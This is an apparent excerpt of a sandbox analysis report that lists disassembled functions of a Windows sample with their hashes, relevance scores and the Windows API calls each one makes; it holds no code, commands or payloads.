Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: ba503b821c0273546a28dbb624113aae31787eef43c5ad3433e6b55757c4936c
Instruction ID: fcf2277d62288e35964cced29e14f0cd71a82e1fe3847569d8d5454d96c169e7
Opcode Fuzzy Hash: ba503b821c0273546a28dbb624113aae31787eef43c5ad3433e6b55757c4936c
Instruction Fuzzy Hash: E1D01273844108FACB1496919888EF9777DB708301F180563F80692160E2259B98FA21

Function 00FE717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e68086f45a2faa405d0403bcdc0c9becb48f4f73fde35871ca8e750569b2e75
Instruction ID: c5f9a44c7c5d6d29ee6e8a3b461fcc49cda6a9d8d3d81ecab34549cd59a4da35
Opcode Fuzzy Hash: 5e68086f45a2faa405d0403bcdc0c9becb48f4f73fde35871ca8e750569b2e75
Instruction Fuzzy Hash: 49C1A075A04356EFDB14DFA5C884EAEBBB5FF48310B108598E805EB251D730ED81EB90

Function 0100E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0100E0BE
CharLowerBuffW.USER32(?,?), ref: 0100E101

Part of subcall function 0100D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0100D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0100E301
_memmove.LIBCMT ref: 0100E314

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: ed421d3c5bdd2c0fcd7187fc3310d7ed6bd2b86cdeff323c81216073134c4411
Instruction ID: 52ce90bb1ad9c02a7d62e6fc9984e09efe9f5c81ef8a7b59a732875773372ef0
Opcode Fuzzy Hash: ed421d3c5bdd2c0fcd7187fc3310d7ed6bd2b86cdeff323c81216073134c4411
Instruction Fuzzy Hash: 8FC17A716083018FD755DF28C880A6ABBE4FF89714F04896EF9999B391D731E945CF82

Function 01008093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 010080C3
CoUninitialize.OLE32 ref: 010080CE

Part of subcall function 00FED56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FED5D4

VariantInit.OLEAUT32(?), ref: 010080D9
VariantClear.OLEAUT32(?), ref: 010083AA

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: a9c05a7fa0a072998446e154a8865572e40c5363e6ec8bb6aa2b7913b59abb05
Instruction ID: f77c854f7e22df3fcfc603a2bfcfdb4d5fd23a12a67c90cc0697d43b155f687b
Opcode Fuzzy Hash: a9c05a7fa0a072998446e154a8865572e40c5363e6ec8bb6aa2b7913b59abb05
Instruction Fuzzy Hash: 9CA17B356087019FEB51DF18C881B2AB7E4BF89314F09845DFA999B3A1DB78ED04CB42

Function 00FE7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,01022C7C,?), ref: 00FE76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,01022C7C,?), ref: 00FE7702
CLSIDFromProgID.OLE32(?,?,00000000,0101FB80,000000FF,?,00000000,00000800,00000000,?,01022C7C,?), ref: 00FE7727
_memcmp.LIBCMT ref: 00FE7748

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 08a3268421fb1c7ce9db613b9deb0ae217bd9f915d1b9f699c3558d300de8f64
Instruction ID: 46efe5d679031249ff70dcf0eeae0a38dcdf2551822358149f0e172765758132
Opcode Fuzzy Hash: 08a3268421fb1c7ce9db613b9deb0ae217bd9f915d1b9f699c3558d300de8f64
Instruction Fuzzy Hash: 39810B75A00209EFCB04DFA5C984EEEB7B9FF89315F204558E505AB250DB71AE06DB60

Function 00FE687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FE688E
SysAllocString.OLEAUT32(00000000), ref: 00FE6937
VariantCopy.OLEAUT32 ref: 00FE6966
VariantClear.OLEAUT32(?), ref: 00FE698D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 2acd5797a60b14ebaa6866e6949596eb5fb4c22966491a69e5a02047088545a9
Instruction ID: a139cd368cddf328e374fc9299130ae45d2f7fe274523c20459e7f6d809137b8
Opcode Fuzzy Hash: 2acd5797a60b14ebaa6866e6949596eb5fb4c22966491a69e5a02047088545a9
Instruction Fuzzy Hash: 2C51F835B003499ADF20AF66C89173EB7E59F64750F20C82FE586D7291EE7CD840A701

Function 010197F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00AAF448,?), ref: 01019863
ScreenToClient.USER32(00000002,00000002), ref: 01019896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 01019903

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: bd4c2ee165edfb5af7ddc238504a2a36a67b3b9ab3bc6a031f417bb285ee26db
Instruction ID: 43c17e7217c5927a0f54b60a377ffd53893a13aa3b5c620d915a898ea0fbaf50
Opcode Fuzzy Hash: bd4c2ee165edfb5af7ddc238504a2a36a67b3b9ab3bc6a031f417bb285ee26db
Instruction Fuzzy Hash: 98517034A00209EFDF25CF68C890AAE7BF6FF45364F108199F8959B295D739A941CB90

Function 00FE9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00FE9AD2
__itow.LIBCMT ref: 00FE9B03

Part of subcall function 00FE9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00FE9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00FE9B6C
__itow.LIBCMT ref: 00FE9BC3

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 6d0f6e76c7f37e23fc79192174088690321aeeca82a77bef7307299892d5edc8
Instruction ID: 2386cf361196d3137e7df538783096a1a9eb56084cabc3abdfdf8d7cf32c0a02
Opcode Fuzzy Hash: 6d0f6e76c7f37e23fc79192174088690321aeeca82a77bef7307299892d5edc8
Instruction Fuzzy Hash: 3541A270A04348ABEF21EF55DC45BEE7BB9EF84720F000069F905A7291DBB89A44DB61

Function 010069AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 010069D1
WSAGetLastError.WSOCK32(00000000), ref: 010069E1

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 01006A45
WSAGetLastError.WSOCK32(00000000), ref: 01006A51

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 0d3f14141f25c77a585bb1d917d55a44fc98e130d0f6de6ce0f3c9c939ff7896
Instruction ID: dbac715d777332982331e7324bc7b722e23cd1594c82963fb863d75706383ea6
Opcode Fuzzy Hash: 0d3f14141f25c77a585bb1d917d55a44fc98e130d0f6de6ce0f3c9c939ff7896
Instruction Fuzzy Hash: 6841AF347002006FFB61AF28CC86F3A77E99B45B54F44805CFA599B2C2DAB99D019B91

Function 0100641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0101F910), ref: 010064A7
_strlen.LIBCMT ref: 010064D9

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 9d1ed3aba7f9bb61c1b689ad6d43e9001d030c102e13ce746bca66feff747b84
Instruction ID: db09b5c8c142a3b09faf97f7bf05a968b57301583cc860869a168fca62b5ee5d
Opcode Fuzzy Hash: 9d1ed3aba7f9bb61c1b689ad6d43e9001d030c102e13ce746bca66feff747b84
Instruction Fuzzy Hash: 60411630600104ABEB11EBA8DC95FBEB7A9AF44310F008158F8559B2D2DB39ED04DB50

Function 00FFB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00FFB89E
GetLastError.KERNEL32(?,00000000), ref: 00FFB8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00FFB8E9
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00FFB915

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 28b88487df90d1970069346ff60d066f2c4f60808a84c7d754ae7bf78ef89f23
Instruction ID: 58a3323a69a569230fdbec9e5a7c76c62516fc834eebe649e71918ec66b588c8
Opcode Fuzzy Hash: 28b88487df90d1970069346ff60d066f2c4f60808a84c7d754ae7bf78ef89f23
Instruction Fuzzy Hash: 3D413C39A00515DFDF10DF18C485A59BBE5AF89320F49808CED4AAB362DB79FD01EB91

Function 01018851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 010188DE

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 9cdde2448a05f585ea7d732b2edb8ec336eeded2611df4158d51a2ec09244b78
Instruction ID: 03361dec2d1389b0837c4a460311ba198995f95a9c06208c5907cc1b46f7a993
Opcode Fuzzy Hash: 9cdde2448a05f585ea7d732b2edb8ec336eeded2611df4158d51a2ec09244b78
Instruction Fuzzy Hash: A2310634600109BFEF719A6CDC45BAD7BA6FB0A350F588143FAD1E61A9C63DE7408752

Function 0101AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0101AB60
GetWindowRect.USER32(?,?), ref: 0101ABD6
PtInRect.USER32(?,?,0101C014), ref: 0101ABE6
MessageBeep.USER32(00000000), ref: 0101AC57

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 90f6325ef1ccf8b6a98898f02282301580e8d04e15c077c631ab4c3050f11b32
Instruction ID: 2fb7d854b8765952acf0a2eb205f51b8cfcb3eba29ee2935638b9d6eea79c99b
Opcode Fuzzy Hash: 90f6325ef1ccf8b6a98898f02282301580e8d04e15c077c631ab4c3050f11b32
Instruction Fuzzy Hash: 5F418E30B01289DFDB22DF58C884BA97BF6FB49310F1484A9E9949B359D739A841CB90

Function 00FF0AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00FF0B27
SetKeyboardState.USER32(00000080,?,00000001), ref: 00FF0B43
PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00FF0BA9
SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00FF0BFB

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 57d62724473486b7a6c11a70b522e7488ad5dc9d79e1cac12ebfdf5e90176851
Instruction ID: 22f6439bbdcd8cb9cd22b6b2cf7875a0d2aa1aaf3abd759a55a7e9e9a053d4c8
Opcode Fuzzy Hash: 57d62724473486b7a6c11a70b522e7488ad5dc9d79e1cac12ebfdf5e90176851
Instruction Fuzzy Hash: FA310770D4025CAEFB308E258C05BFABBA5AF85328F14425AE791D21F3CB798944B755

Function 00FF0C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00FF0C66
SetKeyboardState.USER32(00000080,?,00008000), ref: 00FF0C82
PostMessageW.USER32(00000000,00000101,00000000), ref: 00FF0CE1
SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00FF0D33

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 76e27c5f8fdcbd3a61e04b67ba433c4064e5fadb90680b7b8de22d40bcb06fed
Instruction ID: 25aea08041e2d9039f2d3e133aa9b497d404a41b268217ad4ab8f37d1ef673f0
Opcode Fuzzy Hash: 76e27c5f8fdcbd3a61e04b67ba433c4064e5fadb90680b7b8de22d40bcb06fed
Instruction Fuzzy Hash: 10315830E0025CAEFF308A658C14BFEBBA6AF45330F04431AE694621E3DB399949A751

Function 00FC61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FC61FB
__isleadbyte_l.LIBCMT ref: 00FC6229
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FC6257
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FC628D

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: a45383b0548f8bf392af1ca433680ffba2f579fe69179e8016613296a7186294
Instruction ID: 3d9620c4f7cbffe557785f632bad965cb1d611965b2db412d28ab2b506eee95a
Opcode Fuzzy Hash: a45383b0548f8bf392af1ca433680ffba2f579fe69179e8016613296a7186294
Instruction Fuzzy Hash: 9131CE31A08247AFDF218E65CE4AFAA7BA9BF42320F15402CE864C7191E731D950EB90

Function 01014EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 01014F02

Part of subcall function 00FF3641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FF365B
Part of subcall function 00FF3641: GetCurrentThreadId.KERNEL32 ref: 00FF3662
Part of subcall function 00FF3641: AttachThreadInput.USER32(00000000,?,00FF5005), ref: 00FF3669

GetCaretPos.USER32(?), ref: 01014F13
ClientToScreen.USER32(00000000,?), ref: 01014F4E
GetForegroundWindow.USER32 ref: 01014F54

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 8f869d3f8dd8bd75774e5248ab12009c40637c7bfea82ceaa20d34fcaa57af20
Instruction ID: ccb973aefa712af9997b567da2736e60bd676ae7e2080c5ad64d542674c494dc
Opcode Fuzzy Hash: 8f869d3f8dd8bd75774e5248ab12009c40637c7bfea82ceaa20d34fcaa57af20
Instruction Fuzzy Hash: D8312B71E00108AFDB10EFA9CC859EFB7F9EF99300F01406AE455E7241EA799E058BA1

Function 00FF3C55 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00FF3C7A
Process32FirstW.KERNEL32(00000000,?), ref: 00FF3C88
Process32NextW.KERNEL32(00000000,?), ref: 00FF3CA8
CloseHandle.KERNEL32(00000000), ref: 00FF3D52

Memory Dump Source

Source File: 00000000.00000002.1455008692.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1454980100.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455463245.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455524371.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1455552855.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_7b4Iaf58Rp.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: bca1305dea26f747aad3211115ae60c213b80ba43a1b341f81d096efd88f905a
Instruction ID: cbb002c1a1ab62677ad860e78f4ca95dc0267a920986de3ddd6d3998ad942d50
Opcode Fuzzy Hash: bca1305dea26f747aad3211115ae60c213b80ba43a1b341f81d096efd88f905a
Instruction Fuzzy Hash: 6B31B1311083099FE711EF60CC81ABFBBE8EF95354F50082DF581861A1EB75EA49DB92

Function 0101C498 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

GetCursorPos.USER32(?), ref: 0101C4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FCB9AB,?,?,?,?,?), ref: 0101C4E7
GetCursorPos.USER32(?), ref: 0101C534
